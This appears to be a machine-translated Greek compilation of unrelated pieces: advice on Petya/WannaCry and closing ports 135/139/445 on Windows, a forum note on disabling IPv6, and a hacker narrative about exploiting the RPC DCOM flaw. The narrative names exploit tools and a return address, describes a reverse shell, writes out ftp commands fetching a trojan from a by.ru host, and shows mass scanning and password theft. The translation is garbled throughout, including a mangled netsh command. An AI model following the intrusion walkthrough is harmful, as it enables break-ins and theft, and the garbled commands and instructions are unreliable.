Χθες, άγνωστοι πραγματοποίησαν άλλη μια μαζική επίθεση χρησιμοποιώντας έναν ιό ransomware. Οι ειδικοί είπαν ότι δεκάδες μεγάλες εταιρείες στην Ουκρανία και τη Ρωσία επλήγησαν. Το ransomware ονομάζεται Petya.A (πιθανώς, ο ιός πήρε το όνομα του Πέτρο Ποροσένκο). Γράφουν ότι αν δημιουργήσεις ένα αρχείο perfc (χωρίς επέκταση) και το τοποθετήσεις στο C:\Windows\, ο ιός θα σε παρακάμψει. Εάν ο υπολογιστής σας έκανε επανεκκίνηση και άρχισε να "έλεγχος του δίσκου", πρέπει να τον απενεργοποιήσετε αμέσως. Η εκκίνηση από LiveCD ή USB θα σας δώσει πρόσβαση στα αρχεία. Ένας άλλος τρόπος για να προστατευτείτε είναι να κλείσετε τις θύρες 1024-1035, 135 και 445. Τώρα θα καταλάβουμε πώς να το κάνετε αυτό χρησιμοποιώντας το παράδειγμα των Windows 10.

Βήμα 1
Παω σε τείχος προστασίας των Windows(είναι καλύτερα να επιλέξετε τη λειτουργία βελτιωμένης ασφάλειας), επιλέξτε την καρτέλα " Επιπλέον επιλογές».
Επιλέξτε την καρτέλα " Κανόνες για εισερχόμενες συνδέσεις", μετά δράση" Δημιουργία κανόνα” (στη δεξιά στήλη).

Βήμα 2
Επιλέξτε τον τύπο κανόνα - " για Λιμάνι". Στο επόμενο παράθυρο επιλέξτε " Πρωτόκολλο TCP”, καθορίστε τις θύρες που θέλετε να κλείσετε. Στην περίπτωσή μας αυτό 135, 445, 1024-1035 " (χωρίς εισαγωγικά).

Βήμα 3
Επιλέξτε το στοιχείο " Αποκλεισμός σύνδεσης”, στο επόμενο παράθυρο επισημαίνουμε όλα τα προφίλ: Τομέας, Ιδιωτικός, Δημόσιος.

Βήμα 4
Απομένει να βρούμε ένα όνομα για τον κανόνα (ώστε να είναι εύκολο να βρεθεί στο μέλλον). Μπορείτε να καθορίσετε μια περιγραφή για τον κανόνα.

Εάν ορισμένα προγράμματα σταματήσουν να λειτουργούν ή αρχίσουν να λειτουργούν λανθασμένα, μπορεί να έχετε κλείσει τη θύρα που χρησιμοποιούν. Θα χρειαστεί να προσθέσετε μια εξαίρεση στο τείχος προστασίας για αυτούς.

Θύρα 135 TCPχρησιμοποιείται από απομακρυσμένες υπηρεσίες (DHCP, DNS, WINS κ.λπ.) και σε εφαρμογές πελάτη-διακομιστή της Microsoft (π.χ. Exchange).

Θύρα 445 TCPχρησιμοποιείται σε Microsoft Windows 2000 και μεταγενέστερα για άμεση πρόσβαση TCP/IP χωρίς χρήση NetBIOS (για παράδειγμα, στην υπηρεσία καταλόγου Active Directory).

Δημοσίευση

Ο ιός WannaCry, γνωστός και ως WannaCrypt ή Wanna Decryptor, χτύπησε τον εικονικό κόσμο τον Μάιο του 2017. Κακόβουλο λογισμικόδιείσδυσε σε τοπικά δίκτυα, μολύνοντας τον έναν υπολογιστή μετά τον άλλο, κρυπτογραφούσε αρχεία σε δίσκους και απαίτησε από τον χρήστη να μεταφέρει 300 έως 600 $ σε εκβιαστές για να τα ξεκλειδώσει. Ο ιός Petya, ο οποίος απέκτησε σχεδόν πολιτική φήμη το καλοκαίρι του 2017, ενήργησε με παρόμοιο τρόπο.

Και τα δύο παράσιτα δικτύου διείσδυσαν στο λειτουργικό σύστημα του υπολογιστή του θύματος από την ίδια πόρτα - θύρες δικτύου 445 ή 139. Μετά από δύο μεγάλους ιούς, άρχισαν να εκμεταλλεύονται μικρότεροι τύποι μόλυνσης υπολογιστή. Ποιες είναι αυτές οι θύρες που σαρώνονται από όλους όσοι δεν είναι τεμπέληδες;

Τι είναι υπεύθυνες οι θύρες 445 και 139 στα Windows

Αυτές οι θύρες χρησιμοποιούνται για Σύστημα Windowsγια κοινή χρήση αρχείων και εκτυπωτών. Η πρώτη θύρα είναι υπεύθυνη για το πρωτόκολλο Server Message Blocks (SMB) και το πρωτόκολλο Network Basic Input-Output System (NetBIOS) λειτουργεί μέσω της δεύτερης. Και τα δύο πρωτόκολλα επιτρέπουν υπολογιστές κάτω από Έλεγχος των Windowsσυνδεθείτε μέσω δικτύου σε "κοινόχρηστους" φακέλους και εκτυπωτές μέσω των κύριων πρωτοκόλλων TCP και UDP.

Ξεκινώντας με τα Windows 2000, η ​​κοινή χρήση αρχείων και εκτυπωτών μέσω δικτύου γίνεται κυρίως μέσω της θύρας 445 χρησιμοποιώντας το πρωτόκολλο εφαρμογής SMB. Το πρωτόκολλο NetBIOS χρησιμοποιήθηκε σε προηγούμενες εκδόσεις του συστήματος, λειτουργώντας μέσω των θυρών 137, 138 και 139, και αυτή η δυνατότητα έχει διατηρηθεί σε περισσότερες μεταγενέστερες εκδόσειςσυστήματα ως αταβισμός.

Γιατί οι ανοιχτές θύρες είναι επικίνδυνες

445 και 139 είναι μια λεπτή αλλά σημαντική ευπάθεια στα Windows. Αν αφήσετε αυτές τις θύρες ανασφάλιστες, ανοίγει διάπλατα η πόρτα σας HDDγια απρόσκλητους επισκέπτες όπως ιούς, trojans, worms, καθώς και για επιθέσεις χάκερ. Και αν ο υπολογιστής σας είναι ενεργοποιημένος τοπικό δίκτυο, τότε όλοι οι χρήστες του κινδυνεύουν να μολυνθούν από κακόβουλο λογισμικό.

Στην πραγματικότητα, μοιράζεστε τον σκληρό σας δίσκο με οποιονδήποτε έχει πρόσβαση σε αυτές τις θύρες. Εάν το επιθυμούν και έχουν ικανότητα, οι εισβολείς μπορούν να δουν το περιεχόμενο σκληρός δίσκος, ή ακόμα και να διαγράψετε δεδομένα, να μορφοποιήσετε τον ίδιο τον δίσκο ή να κρυπτογραφήσετε αρχεία. Αυτό ακριβώς έκαναν Ιοί WannaCryκαι η Petya, της οποίας η επιδημία σάρωσε τον κόσμο αυτό το καλοκαίρι.

Έτσι, εάν ενδιαφέρεστε για την ασφάλεια των δεδομένων σας, δεν θα είναι περιττό να μάθετε πώς να κλείνετε τις θύρες 139 και 445 στα Windows.

Μάθετε εάν οι θύρες είναι ανοιχτές

Στις περισσότερες περιπτώσεις, η θύρα 445 είναι ανοιχτή στα Windows επειδή οι λειτουργίες εκτυπωτή και κοινής χρήσης αρχείων ενεργοποιούνται αυτόματα ακόμα και όταν εγκατάσταση των Windows. Αυτό μπορεί να ελεγχθεί εύκολα στο μηχάνημά σας. Πατήστε τη συντόμευση πληκτρολογίου Win+Rνα ανοίξει το παράθυρο γρήγορη εκκίνηση. Σε αυτό μπείτε cmd"για να εκτελέσετε τη γραμμή εντολών. Στη γραμμή εντολών, πληκτρολογήστε " netstat-na" και πατήστε Εισαγω. Αυτή η εντολή σάς επιτρέπει να σαρώσετε όλες τις ενεργές θύρες δικτύου και να εμφανίσετε δεδομένα σχετικά με την κατάστασή τους και τις τρέχουσες εισερχόμενες συνδέσεις.

Μετά από λίγα δευτερόλεπτα, θα εμφανιστεί ο πίνακας στατιστικών θυρών. Στην κορυφή του πίνακα, θα εμφανίζεται η διεύθυνση IP της θύρας 445. Εάν η κατάσταση στην τελευταία στήλη του πίνακα είναι «ΑΚΡΟΑΣΗ», σημαίνει ότι η θύρα είναι ανοιχτή. Ομοίως, μπορείτε να βρείτε τη θύρα 139 στον πίνακα και να μάθετε την κατάστασή της.

Πώς να κλείσετε τις θύρες στα Windows 10/8/7

Υπάρχουν τρεις βασικές μέθοδοι για να κλείσετε τη θύρα 445 στα Windows 10, 7 ή 8. Δεν διαφέρουν πολύ μεταξύ τους ανάλογα με την έκδοση του συστήματος και είναι αρκετά απλές. Μπορείτε να δοκιμάσετε οποιοδήποτε από αυτά για να διαλέξετε. Μπορείτε επίσης να κλείσετε τη θύρα 139 με τον ίδιο τρόπο.

Κλείστε τις θύρες μέσω τείχους προστασίας

Η πρώτη μέθοδος, η οποία σας επιτρέπει να κλείσετε τη θύρα 445 στα Windows, είναι η απλούστερη και είναι διαθέσιμη σε σχεδόν κάθε χρήστη.

  1. Παω σε Έναρξη > Πίνακας Ελέγχου > Τείχος προστασίας των Windowsκαι κάντε κλικ στον σύνδεσμο Επιπλέον επιλογές.
  2. Κάντε κλικ Εισερχόμενοι κανόνες εξαίρεσης > Νέος κανόνας. Στο παράθυρο που εμφανίζεται, επιλέξτε Για Θύρα > Επόμενο > Πρωτόκολλο TCP > Καθορισμένες τοπικές θύρες, στο πεδίο δίπλα στην εισαγωγή 445 και κάντε κλικ Περαιτέρω.
  3. Επόμενη επιλογή Αποκλεισμός σύνδεσηςκαι πατήστε ξανά Περαιτέρω. Επιλέξτε ξανά τρία πλαίσια ελέγχου Περαιτέρω. Καθορίστε ένα όνομα και προαιρετικά μια περιγραφή για τον νέο κανόνα και κάντε κλικ Ετοιμος.

Τώρα η δυνατότητα εισερχόμενης σύνδεσης στη θύρα 445 θα κλείσει. Εάν είναι απαραίτητο, ένας παρόμοιος κανόνας μπορεί να δημιουργηθεί για τη θύρα 139.

Κλείσιμο θυρών μέσω γραμμής εντολών

Η δεύτερη μέθοδος περιλαμβάνει λειτουργίες γραμμής εντολών και είναι πιο κατάλληλη για προχωρημένους χρήστες των Windows.

  1. Κάντε κλικ Αρχήκαι στη γραμμή αναζήτησης στο κάτω μέρος του μενού, πληκτρολογήστε " cmd". Στη λίστα που εμφανίζεται, κάντε κλικ κάντε δεξί κλικποντίκι επάνω cmdκαι επιλέξτε Εκτελέστε ως διαχειριστής.
  2. Αντιγράψτε την εντολή στο παράθυρο της γραμμής εντολών Το netsh advfirewall έθεσε την κατάσταση allprofile σε.Κάντε κλικ Εισαγω.
  3. Στη συνέχεια, αντιγράψτε την ακόλουθη εντολή: netsh advfirewall προσθήκη κανόνα dir=in action=block protocol=TCP localport=445 name="Block_TCP-445".Κάντε κλικ Εισαγωπάλι.

Αυτή η διαδικασία θα δημιουργήσει επίσης έναν κανόνα του τείχους προστασίας των Windows για το κλείσιμο της θύρας 445. Ορισμένοι χρήστες, ωστόσο, το αναφέρουν αυτό αυτή τη μέθοδοδεν λειτουργεί στα μηχανήματα τους: όταν είναι επιλεγμένο, η θύρα παραμένει στην κατάσταση "ΑΚΡΟΑΣΗ". Σε αυτή την περίπτωση, θα πρέπει να δοκιμάσετε την τρίτη μέθοδο, η οποία είναι επίσης αρκετά απλή.

Κλείσιμο θυρών μέσω του μητρώου των Windows

Μπορείτε επίσης να αποκλείσετε τις συνδέσεις στη θύρα 445 αλλάζοντας το μητρώο συστήματος. Χρησιμοποιήστε αυτή τη μέθοδο με προσοχή: μητρώο των Windowsείναι η κύρια βάση δεδομένων ολόκληρου του συστήματος και ένα τυχαίο λάθος μπορεί να οδηγήσει σε απρόβλεπτες συνέπειες. Πριν εργαστείτε με το μητρώο, συνιστάται να κάνετε αντιγράφων ασφαλείας, για παράδειγμα, χρησιμοποιώντας το πρόγραμμα CCleaner.

  1. Κάντε κλικ Αρχήκαι στη γραμμή αναζήτησης πληκτρολογήστε “regedit”. Κάντε κλικ Εισαγω.
  2. Στο δέντρο μητρώου, αλλάξτε στον ακόλουθο κατάλογο: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters.
  3. Στη δεξιά πλευρά του παραθύρου θα εμφανιστεί μια λίστα επιλογών. Κάντε δεξί κλικ σε μια κενή περιοχή της λίστας και επιλέξτε Δημιουργώ. Από το αναπτυσσόμενο μενού, επιλέξτε Τιμή DWORD (32-bit)ή Τιμή DWORD (64-bit)ανάλογα με τον τύπο του συστήματός σας (32-bit ή 64-bit).
  4. Μετονομάζω νέα παράμετροςσε SMBDevice Enabledκαι, στη συνέχεια, κάντε διπλό κλικ σε αυτό. Στο εμφανιζόμενο παράθυρο Αλλαγή παραμέτρουστο χωράφι Εννοιααντικαταστήστε το 1 με 0 και κάντε κλικ Εντάξειγια ΕΠΙΒΕΒΑΙΩΣΗ.

Αυτή η μέθοδος είναι πιο αποτελεσματική εάν ακολουθήσετε ακριβώς τις παραπάνω οδηγίες. Σημειώστε ότι ισχύει μόνο για τη θύρα 445.

Για να είναι πιο αποτελεσματική η προστασία, αφού κάνετε αλλαγές στο μητρώο, μπορείτε επίσης να απενεργοποιήσετε υπηρεσία Windowsυπηρέτης. Για να το κάνετε αυτό, κάντε τα εξής:

  1. Κάντε κλικ στο κουμπί Έναρξη και πληκτρολογήστε στη γραμμή αναζήτησης "services.msc".Θα ανοίξει μια λίστα με τις υπηρεσίες συστήματος των Windows.
  2. Βρείτε την υπηρεσία διακομιστή και κάντε διπλό κλικ σε αυτήν. Κατά κανόνα, βρίσκεται κάπου στη μέση της λίστας.
  3. Στο παράθυρο που εμφανίζεται, στην αναπτυσσόμενη λίστα Τύπος εκκίνησηςεπιλέγω άτομα με ειδικές ανάγκεςκαι πατήστε Εντάξει.

Οι παραπάνω μέθοδοι (με εξαίρεση την τρίτη) σάς επιτρέπουν να κλείσετε όχι μόνο τη θύρα 445, αλλά και τις θύρες 135, 137, 138, 139. Για να το κάνετε αυτό, κατά την εκτέλεση της διαδικασίας, απλώς αντικαταστήστε τον αριθμό θύρας με αυτόν που χρειάζομαι.

Εάν αργότερα χρειαστεί να ανοίξετε θύρες, απλώς διαγράψτε τον κανόνα που δημιουργήθηκε Τείχος προστασίας των Windowsή αλλάξτε την τιμή της παραμέτρου που δημιουργήθηκε στο μητρώο από 0 σε 1 και, στη συνέχεια, ενεργοποιήστε ξανά την υπηρεσία Windows Serverεπιλέγοντας από τη λίστα Τύπος εκκίνησηςέννοια Αυτομάτωςαντί άτομα με ειδικές ανάγκες.

Σπουδαίος!Πρέπει να θυμόμαστε ότι η θύρα 445 στα Windows είναι υπεύθυνη για την κοινή χρήση αρχείων, φακέλων και εκτυπωτών. Έτσι, αν κλείσετε δεδομένο λιμάνι, δεν μπορείτε πλέον να "μοιράζεστε" κοινόχρηστο φάκελογια άλλους χρήστες ή εκτυπώστε το έγγραφο μέσω του δικτύου.

Εάν ο υπολογιστής σας είναι συνδεδεμένος σε τοπικό δίκτυο και χρειάζεστε αυτές τις λειτουργίες για να λειτουργήσουν, θα πρέπει να χρησιμοποιήσετε εργαλεία ασφαλείας τρίτων κατασκευαστών. Για παράδειγμα, ενεργοποιήστε τείχος προστασίαςτο antivirus σας, το οποίο θα αναλάβει τον έλεγχο όλων των θυρών και θα τις παρακολουθεί για μη εξουσιοδοτημένη πρόσβαση.

Ακολουθώντας τις παραπάνω συστάσεις, μπορείτε να προστατευθείτε από μια λεπτή αλλά σοβαρή ευπάθεια στα Windows και να προστατεύσετε τα δεδομένα σας από πολλούς τύπους κακόβουλου λογισμικού που μπορούν να εισέλθουν στο σύστημα μέσω των θυρών 139 και 445.

Η ευπάθεια ήταν πραγματικά τρομακτική
Το έτοιμο exploit αποδείχθηκε ότι δεν ήταν διαθέσιμο για
ο κύριος όγκος των ανθρώπων ... Μάλλον γι' αυτό
κανείς δεν ένιωσε φόβο...

Μια ομάδα Πολωνών ειδικών στον τομέα
ασφάλεια τεχνολογία υπολογιστών"Τελευταίος
Stage of Delirium» είπε στο κοινό για το που βρέθηκε
τα τρωτά σημεία τους, χειρισμός αντικειμένων DCOM
πλαίσιο του πρωτοκόλλου RPC. Ήταν κάτι
καταπληκτικό γιατί αυτό το πρωτόκολλο
χρησιμοποιείται σχεδόν από όλους
υπάρχουσες εκδόσεις των Windows.
Ευάλωτα αποδείχθηκε ότι ήταν τα Windows NT, Windows XP, Windows 2000
και ακόμη και ο Windows Server 2003 ήταν στόχος. Αυτό
ήταν υπεραρκετή για να αναλάβει
υπολογιστές των περισσότερων χρηστών
Δίκτυα Διαδικτύου. Επιπλέον, πολλοί διακομιστές δεν είναι
μπλοκαρισμένα εισερχόμενα πακέτα στη θύρα 135,
ήταν αυτός που χρησιμοποιήθηκε για την επίθεση. Τι
τους έκανε πιθανά θύματα.

Αλλά λίγες ώρες αργότερα, ο Todd Sabin αναφέρει,
ότι όλες οι υπηρεσίες RPC είναι ευάλωτες. το
σημαίνει ότι η ρύθμιση του τείχους προστασίας σε
Το μπλοκάρισμα της θύρας 135 δεν είναι αρκετό
μέσα προστασίας. Εκτεθειμένοι κίνδυνοι
υπολογιστές με ανοιχτό 135 (UDP/TCP), 139, 445 και 593
λιμάνια. κάλυψη από τα ΜΜΕ δεδομένο σφάλμα, πως
πιθανό κίνδυνο για την ασφάλεια
χρήστες Windows. Το θέμα πήγε στο παγκόσμιο
καταστροφή. Αλλά αφού το κοινό
κανένα exploit δεν απελευθερώθηκε, όλοι συνέχισαν
ζήσε την παλιά σου ζωή χωρίς να το σκέφτεσαι
συνέπειες της εμφάνισής του στις μάζες.

Αλλά δεν αντέδρασαν όλοι τόσο παθητικά
την εμφάνιση αυτής της ευπάθειας. χάκερ
άρχισε σταδιακά να γράφει ιδιωτικά
κατορθώματα, και τα παιδιά του σεναρίου το περίμεναν συνέχεια
εμφάνιση. Το αποτέλεσμα δεν άργησε
Περίμενε. Μέσα σε λίγες μέρες εμφανίζονται
ορισμένες εξελίξεις στον τομέα αυτό,
εμφανίζονται τα πρώτα κατορθώματα. Παρόλα αυτά
τα περισσότερα από αυτά προκαλούν απλώς μια συντριβή
στο απομακρυσμένο σύστημα. Τι μπορεί να εξηγηθεί
δεδομένου ότι οι τεχνικές λεπτομέρειες σχετικά
η ευπάθεια που βρέθηκε δεν ήταν γνωστή. Παρόλο
ορισμένες εκδόσεις λειτουργικού συστήματος είναι ήδη επιτυχείς
εκμεταλλεύτηκαν.

Αυτή η μέρα ήταν ένα σημείο καμπής στην ιστορία.
εκμετάλλευση αυτής της ευπάθειας. Τελικά
εμφανίζεται τεχνική περιγραφήΠροβλήματα.
Μετά από αυτό γεννιέται ένας μεγάλος αριθμός
εκμεταλλεύσεις για διαφορετικές εκδόσεις των Windows.
Κάποια από αυτά έχουν ακόμη και γραφικό
διεπαφή και μερικές φορές τη λειτουργία σάρωσης
ένα συγκεκριμένο εύρος διευθύνσεων IP.

Ήταν αυτή τη στιγμή που μια τεράστια
επίθεση από χάκερ σε απλούς χρήστες.
Επιπλέον, εμφανίστηκε το σκουλήκι του Διαδικτύου MS Blast,
που διεισδύουν εύκολα στους υπολογιστές
συνδεδεμένο στο Διαδίκτυο και ακόμη
εταιρικά δίκτυα των μεγαλύτερων εταιρειών
ειρήνη. Όλοι κινδυνεύουν…

Η επίθεση σε απομακρυσμένο μηχάνημα δεν ισοδυναμεί με
ειδική εργασία. Έτσι ανέλαβαν τα παιδιά του σεναρίου
την επιχείρησή σας. Κλοπή πιστωτικών καρτών και ιδιωτικών
τα exploits έχουν αυξηθεί αρκετές φορές. Και
έχουν γίνει πολλά νόστιμα τμήματα του δικτύου
Δοκίμασέ το. Αυτό έκανε
ένας χάκερ. Ήθελε να αναλάβει τον διακομιστή για πολύ καιρό,
αλλά μια αξιοπρεπή ευπάθεια κάτω από αυτό πριν από αυτό
δεν είχα. Μην το εκμεταλλευτείτε αυτό
απλά δεν θα μπορούσε να είναι δώρο της μοίρας.

Θεατρικό έργο σε τρεις πράξεις

Το πρώτο πράγμα που έπρεπε να κάνει πριν
επίθεση, είναι να ελέγξουμε ποια
εγκατεστημένο λειτουργικό σύστημα
υπηρέτης. Για αυτό χρησιμοποίησε
βοηθητικό πρόγραμμα nmap. Ο χάκερ έχει γράψει επανειλημμένα για αυτήν
πιθανότητες, αλλά θα επαναλάβω τον εαυτό μου και θα το πω αυτό
χρησιμοποιείται για τον προσδιορισμό της έκδοσης του λειτουργικού συστήματος
στο απομακρυσμένος υπολογιστής. Ευτυχώς αυτή
υπάρχει τόσο για Windows όσο και για *nix. ΑΛΛΑ
ως χάκερ για τη δουλειά του
χρησιμοποίησε Windows και μετά η επιλογή του έπεσε
γραφική έκδοση του nmap.

Λίγα λεπτά λειτουργίας σαρωτή και
το αποτέλεσμα είναι θετικό. 135 λιμάνι αποδείχθηκε ότι ήταν
ανοιχτό και δεν προστατεύεται από τείχος προστασίας. το
ήταν η αρχή του τέλους, η αρχή του πολυαναμενόμενου
επιθέσεις. Σε αυτό το σημείο, έχει ήδη γραφτεί
πολλά exploit, συμπεριλαμβανομένου του "RCP Exploit GUI #2".
Το χαρακτηριστικό γνώρισμά του ήταν ότι αυτός
είχε μια γραφική διεπαφή και περιέχεται σε
δικές ενσωματωμένες λειτουργίες σάρωσης
Εύρος IP, καθώς και διακομιστής FTP.

Εκτελώντας το exploit, υπέδειξε τη διεύθυνση
υπολογιστής στόχος. Αλλά στη λίστα OS για
επιτέθηκε Μηχανές Windows NT δεν προσδιορίστηκε. Αλλά
εγκαταστάθηκε στον διακομιστή. το
σοβαρό πρόβλημα γιατί
για να εκτελέσετε ένα exploit πρέπει να το γνωρίζετε
την ακριβή διεύθυνση στη μνήμη, για να μεταφέρετε στη συνέχεια
έλεγχο πάνω του. Λίγο σκάψιμο
αρχεία που έχουν ληφθεί με το exploit, it
βρήκε μια μικρή λίστα διευθύνσεων κάτω από το ευρύ
ποικιλία Γραμμή Windows. Ανάμεσα τους
ήταν παρόν και τα Windows NT ήταν προεγκατεστημένα
Service Pack 4. Ήταν το νόημά του που υπέδειξε
ως διεύθυνση επιστροφής με το φτύσιμο του εγχειριδίου
Επιλογή λειτουργικού συστήματος. Ο αριθμός 0xE527F377 έγινε το μυστικό του
ένα πέρασμα στη ζωή του διακομιστή. Και άρχισε να επιτίθεται.

Το σύστημα εγκατέλειψε χωρίς κανένα
περιστατικά, οπότε ο χάκερ πήρε ένα αντίστροφο κέλυφος
Με απομακρυσμένος διακομιστής. Τώρα που μπορούσε
εκτελέστε οτιδήποτε σε αυτό, ήρθε
ώρα να εγκαταστήσετε το Trojan. Ανάμεσα στα μεγάλα
αριθμός των πιθανών, επιλέχθηκε ο DonaldDick. Για
έπρεπε να πραγματοποιήσει το σχέδιό του
λάβετε φιλοξενία δωρεάν διακομιστήΜε
Υποστήριξη FTP. Το BY.RU ταιριάζει απόλυτα, ακριβώς
εκεί ανέβασε τον διακομιστή για το Trojan. Τώρα,
όταν ο DonaldDick έγινε διαθέσιμος μέσω FTP, αυτός
ανέλαβε το θύμα, ή μάλλον άρχισε να ανεβάζει
Διακομιστής Trojan σε αυτό. Ηταν καλο
ένα καλά μελετημένο σχέδιο, γιατί η ευπάθεια
θα μπορούσε να είχε επιδιορθωθεί, και το Trojan βρίσκεται επίσης στην Αφρική
γενναίο και φιλεργό άτομο. Πληκτρολογώντας στην κονσόλα ftp, άρχισε
ανέβασμα αρχείου. Τον πήρε όλη η διαδικασία
γράφοντας μόνο πέντε γραμμές:

ανοιχτό by.ru
server_name.by.ru
Κωδικός πρόσβασης
λάβετε το fooware.exe
αντίο

Όπου το fooware.exe είναι ο μετονομασμένος διακομιστής για τον οποίο
Ντόναλντ Ντικ. Όταν γίνει λήψη του αρχείου, έγινε
απλά τρέξε το. Για αυτό απλά
έγραψε το όνομα του αρχείου (fooware.exe) και το απόλαυσε
πάτησε Enter ... Μετά από το οποίο ο χάκερ έλαβε ένα βολικό
έλεγχο του διακομιστή.

Αλλά ξέρετε πώς είναι πάντα πότε
βρείτε κάτι ενδιαφέρον συνεχίστε με
Παίξ'το. Έτσι ήθελε ο Χάκερ μας
λάβετε περισσότερα από ένα συστήματα. Αφού κοίταξε
ότι η εκμετάλλευση επιτρέπει μια μαζική
σάρωση, άρχισε να δουλεύει, ή μάλλον
Ο KaHt ανέλαβε τη δουλειά. Η χρήση του
αποδείχθηκε ότι δεν ήταν δύσκολο. Έτσι για παράδειγμα, να
σχετικά με τη σάρωση του δικτύου με IP 192.168.0.* (κατηγορία C), αυτό
έπρεπε να πληκτρολογήσετε "KaHt.exe 129.168.0.1
192.168.0.254". Κάτι που στην πραγματικότητα έκανε,
στη συνέχεια ελέγχετε περιοδικά
Αποτελέσματα. Έτσι απέκτησε πρόσβαση
σε ακόμη περισσότερους χρήστες, από
για τα οποία στη συνέχεια κατάφερε να αποκτήσει κωδικούς πρόσβασης
διαφορετικές υπηρεσίες, αλληλογραφία και πολλά άλλα
ΧΡΗΣΙΜΕΣ ΠΛΗΡΟΦΟΡΙΕΣ. Για να μην πω,
ότι άρχισε να χρησιμοποιεί πολλά από αυτά ως
ανώνυμοι πληρεξούσιοι.

Τροφή για σκέψη

Αν και η Microsoft κυκλοφόρησε μια ενημέρωση κώδικα πριν από πολύ καιρό,
οι χρήστες και οι διαχειριστές δεν βιάζονται
εγκαταστήσει ενημερώσεις κώδικα, ελπίζοντας ότι το δίκτυό τους δεν το κάνει
κανείς δεν θα ενδιαφέρεται. Αλλά τέτοιοι χάκερ
μεγάλος αριθμός και εγκατάσταση του patch είναι
περισσότερο αναγκαιότητα παρά δυνατότητα.
Μπορείτε επίσης να αποκλείσετε όλα τα εισερχόμενα πακέτα
στις θύρες 135, 139, 445 και 593.

Φυσικά, ο χάκερ τα κατάφερε όλα αυτά
ανώνυμος διακομιστής μεσολάβησης και ως αποτέλεσμα καθαρίστηκε
πίσω από ένα ίχνος παρουσίας στο σύστημα. Αλλά εσύ
πρέπει να σκεφτεί πριν επαναλάβει
τα κατορθώματά του. Εξάλλου, τέτοιες ενέργειες εξετάζονται
παράνομη και μπορεί να οδηγήσει σε
είσαι αρκετά αξιοθρήνητος...

Αίμα, το γεγονός ότι το τείχος προστασίας σας δείχνει ότι το svchost.exe ακούει αυτήν τη θύρα δεν σημαίνει ότι είναι ανοιχτή για σύνδεση από έξω.

Οι κανόνες φαίνεται να είναι γραμμένοι και πρέπει να λειτουργούν.

Έχετε δοκιμάσει σαρωτές θυρών; - TsOB (Κέντρο Παροχής Ασφαλείας) (ρήτρα 2.7)

Και μην ξεχνάτε ότι το IPv6 θα πρέπει ακόμα να ελεγχθεί, γιατί. είναι ενεργοποιημένο στο σύστημά σας, αλλά οι σαρωτές συνήθως ελέγχουν μόνο το IPv4 (μιλώ για κεντρικές υπηρεσίες).

Εάν δεν χρειάζεστε καθόλου αυτό το πρωτόκολλο, τότε μπορείτε να το απενεργοποιήσετε:

Για να απενεργοποιήσετε τα στοιχεία IP έκδοσης 6 στο Windows Vista, ακολουθήστε τα παρακάτω βήματα.

1. Κάντε κλικ στο κουμπί Έναρξη, πληκτρολογήστε regedit στο πλαίσιο Έναρξη αναζήτησης και, στη συνέχεια, επιλέξτε regedit.exe από τη λίστα Προγράμματα.

2. Στο παράθυρο διαλόγου Έλεγχος λογαριασμού χρήστη, κάντε κλικ στην επιλογή Συνέχεια.

3. Εντοπίστε και επιλέξτε το ακόλουθο δευτερεύον κλειδί μητρώου:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\

4. Κάντε διπλό κλικ στο DisabledComponents για να αλλάξετε τη ρύθμιση DisabledComponents.

Σημείωση. Εάν η παράμετρος DisabledComponents δεν είναι διαθέσιμη, πρέπει να δημιουργηθεί. Για να το κάνετε αυτό, ακολουθήστε τα παρακάτω βήματα.

1. Στο μενού Επεξεργασία, επιλέξτε Νέο και, στη συνέχεια, Τιμή DWORD (32 bit).

2. Πληκτρολογήστε DisabledComponents και πατήστε ENTER.

3. Κάντε διπλό κλικ στο DisabledComponents.

5. Εισαγάγετε οποιαδήποτε από τις ακόλουθες τιμές για να ρυθμίσετε τις παραμέτρους της IP έκδοσης 6 και, στη συνέχεια, κάντε κλικ στο OK.

1. Εισαγάγετε 0 για να ενεργοποιήσετε όλα τα στοιχεία IP έκδοσης 6.

Σημείωση. Η τιμή "0" χρησιμοποιείται από προεπιλογή.

2. Εισαγάγετε 0xffffffff για να απενεργοποιήσετε όλα τα στοιχεία IP έκδοσης 6 εκτός από τη διεπαφή επαναφοράς. Με αυτήν την τιμή, τα Windows Vista θα χρησιμοποιούν επίσης IP έκδοση 4 στις πολιτικές προθέματος αντί για IPv6.

3. Εισαγάγετε 0x20 για να χρησιμοποιήσετε το πρόθεμα IP έκδοσης 4 στις πολιτικές αντί για IP έκδοση 6.

4. Εισαγάγετε 0x10 για να απενεργοποιήσετε τις εγγενείς διεπαφές IP έκδοσης 6.

5. Εισαγάγετε 0x01 για να απενεργοποιήσετε όλες τις διεπαφές σήραγγας έκδοσης IP 6.

6. Εισαγάγετε 0x11 για να απενεργοποιήσετε όλες τις διεπαφές IP έκδοσης 6 εκτός από τη διεπαφή loopback.

Σημειώσεις

* Η χρήση τιμών άλλες από 0x0 ή 0x20 μπορεί να προκαλέσει την αποτυχία της υπηρεσίας δρομολόγησης και απομακρυσμένης πρόσβασης.

* Πρέπει να επανεκκινήσετε τον υπολογιστή σας για να τεθούν σε ισχύ οι αλλαγές.

Οι πληροφορίες σε αυτό το άρθρο ισχύουν για τα ακόλουθα προϊόντα.

*Windows Vista Enterprise

*Έκδοση 64-bit των Windows Vista Enterprise

*Windows Vista Home Basic έκδοση 64-bit

*Windows Vista Home Premium έκδοση 64-bit

*Windows Vista Ultimate έκδοση 64-bit

*Windows Vista Business

*Windows Vista Business έκδοση 64-bit

*Windows Vista Home Basic

*Windows Vista Home Premium

*Windows Vista Starter

*Windows Vista Ultimate

*Windows 7 Enterprise

*Windows 7 Home Basic

*Windows 7 Home Premium

*Windows 7 Professional

*Windows 7 Ultimate

*Κέντρο δεδομένων Windows Server 2008 R2

* Windows Server 2008 R2 Enterprise

*Windows Server 2008 R2 Standard

*Κέντρο δεδομένων Windows Server 2008

*Windows Server 2008 Enterprise

*Windows Server 2008 Standard

Πηγή - http://support.microsoft.com/kb/929852

Μετά την αποσύνδεση και την επανεκκίνηση, έχετε από τη λίστα που έλαβε η εντολή ipconfig /allένα σωρό επιπλέον γραμμές θα εξαφανιστούν και θα παραμείνουν μόνο οι διεπαφές που γνωρίζετε καλά.

Η αντίστροφη συμπερίληψη πραγματοποιείται απλώς διαγράφοντας το κλειδί που δημιουργήθηκε από το μητρώο ή αντικαθιστώντας την τιμή με "0" και στη συνέχεια επανεκκινώντας.

